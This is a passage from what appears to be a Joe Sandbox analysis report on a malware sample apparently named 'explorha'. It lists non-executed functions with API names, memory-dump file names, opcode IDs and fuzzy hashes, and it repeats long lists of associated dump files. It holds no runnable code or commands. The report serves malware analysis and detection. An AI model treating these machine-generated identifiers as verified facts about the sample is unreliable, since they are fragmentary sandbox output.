                                                                                                      • Associated: 00000001.00000002.1885150152.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885197334.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885239465.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885280587.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885308584.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885349685.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885393712.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885436688.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885511659.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885646914.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885810855.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885865893.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886054089.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886116787.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886155065.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886196136.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886231707.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886268739.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886307677.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886353370.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886389613.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886389613.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886472172.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886511462.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886550159.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886593194.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886633721.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886673582.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886711070.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886751171.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886795331.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1464230837-0
                                                                                                      • Opcode ID: 7ec6452b6fe7a2fe8aa5f7764c9e61173a2ae021cb5f4e0cdec71ed68136b6bf
                                                                                                      • Instruction ID: e0862f7b94bf262a337686cc56c320f44fe1f4cac1899720eb75a24c9f4282e8
                                                                                                      • Opcode Fuzzy Hash: 7ec6452b6fe7a2fe8aa5f7764c9e61173a2ae021cb5f4e0cdec71ed68136b6bf
                                                                                                      • Instruction Fuzzy Hash: BE2157727042049BFB1CDB6CDD897ACB766FB85321F24821CE419EB3D5CBB696808752
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Non-executed Functions

                                                                                                      Function 00898829 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1884728884.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.1884687592.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884728884.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884794570.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884815207.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884839567.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884932872.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884958352.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884984098.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884984098.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885037411.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885058736.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885085749.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885105956.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885128001.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885150152.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885197334.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885239465.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885280587.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885308584.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885349685.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885393712.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885436688.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885511659.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885646914.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885810855.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885865893.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886054089.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886116787.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886155065.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886196136.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886231707.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886268739.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886307677.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886353370.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886389613.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886389613.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886472172.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886511462.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886550159.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886593194.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886633721.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886673582.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886711070.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886751171.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886795331.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: _wcsrchr
                                                                                                      • String ID: .bat$.cmd$.com$.exe
                                                                                                      • API String ID: 1752292252-4019086052
                                                                                                      • Opcode ID: 78fd98ddb33838edcde554d28232dd59ae9c5b388274d1bbe26f9c57f4677aa5
                                                                                                      • Instruction ID: b05c6622cec164a70c840783034b95d437fbec275dcb87a659f4224268f2b486
                                                                                                      • Opcode Fuzzy Hash: 78fd98ddb33838edcde554d28232dd59ae9c5b388274d1bbe26f9c57f4677aa5
                                                                                                      • Instruction Fuzzy Hash: 2201A577A04726692E143018AC026776798FBC3BB071D003EFC54F72C2EE94DC0141A9
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0086D6EE Relevance: 7.7, APIs: 5, Instructions: 235COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1884728884.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.1884687592.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884728884.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884794570.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884815207.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884839567.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884932872.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884958352.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884984098.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884984098.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885037411.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885058736.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885085749.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885105956.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885128001.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885150152.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885197334.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885239465.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885280587.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885308584.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885349685.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885393712.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885436688.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885511659.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885646914.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885810855.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885865893.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886054089.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886116787.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886155065.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886196136.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886231707.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886268739.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886307677.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886353370.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886389613.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886389613.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886472172.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886511462.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886550159.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886593194.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886633721.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886673582.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886711070.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886751171.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886795331.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Mtx_unlock
                                                                                                      • String ID:
                                                                                                      • API String ID: 1418687624-0
                                                                                                      • Opcode ID: 900e0ff68e5bd5b7b1d830803db81a26411b684bf22629a0661be177683c9c0b
                                                                                                      • Instruction ID: 1cf2141e0495e21068f2d56a1dc026ee645a5e6b208ff28d57e194510385e35c
                                                                                                      • Opcode Fuzzy Hash: 900e0ff68e5bd5b7b1d830803db81a26411b684bf22629a0661be177683c9c0b
                                                                                                      • Instruction Fuzzy Hash: 5F81E472E003159BD7259B28CC45FAAB7B8FF09314F164679E919E7291EB31EC00CB91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0089E110 Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1884728884.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.1884687592.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884728884.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884794570.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884815207.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884839567.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884932872.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884958352.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884984098.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884984098.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885037411.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885058736.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885085749.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885105956.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885128001.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885150152.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885197334.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885239465.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885280587.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885308584.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885349685.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885393712.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885436688.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885511659.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885646914.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885810855.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885865893.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886054089.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886116787.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886155065.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886196136.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886231707.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886268739.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886307677.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886353370.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886389613.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886389613.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886472172.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886511462.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886550159.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886593194.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886633721.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886673582.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886711070.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886751171.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886795331.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: _strrchr
                                                                                                      • String ID:
                                                                                                      • API String ID: 3213747228-0
                                                                                                      • Opcode ID: b713bfd49b51041abb555fe8b87117765181b7de4fabe3ba4743ab7c7481a45c
                                                                                                      • Instruction ID: d5b07ae4540bffbf3c9dc836fe3e5f6872c2b172b861e843d638aaa14b598de3
                                                                                                      • Opcode Fuzzy Hash: b713bfd49b51041abb555fe8b87117765181b7de4fabe3ba4743ab7c7481a45c
                                                                                                      • Instruction Fuzzy Hash: 8CB12232A046959FDF11EF68C881BAEBFA5FF56300F2C816AE841DB342D6349D01CB61
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00862DC0 Relevance: 6.3, APIs: 4, Instructions: 272COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1884728884.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.1884687592.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884728884.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884794570.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884815207.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884839567.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884932872.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884958352.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884984098.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884984098.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885037411.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885058736.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885085749.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885105956.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885128001.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885150152.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885197334.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885239465.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885280587.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885308584.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885349685.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885393712.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885436688.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885511659.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885646914.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885810855.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885865893.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886054089.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886116787.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886155065.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886196136.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886231707.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886268739.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886307677.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886353370.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886389613.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886389613.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886472172.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886511462.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886550159.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886593194.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886633721.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886673582.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886711070.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886751171.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886795331.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
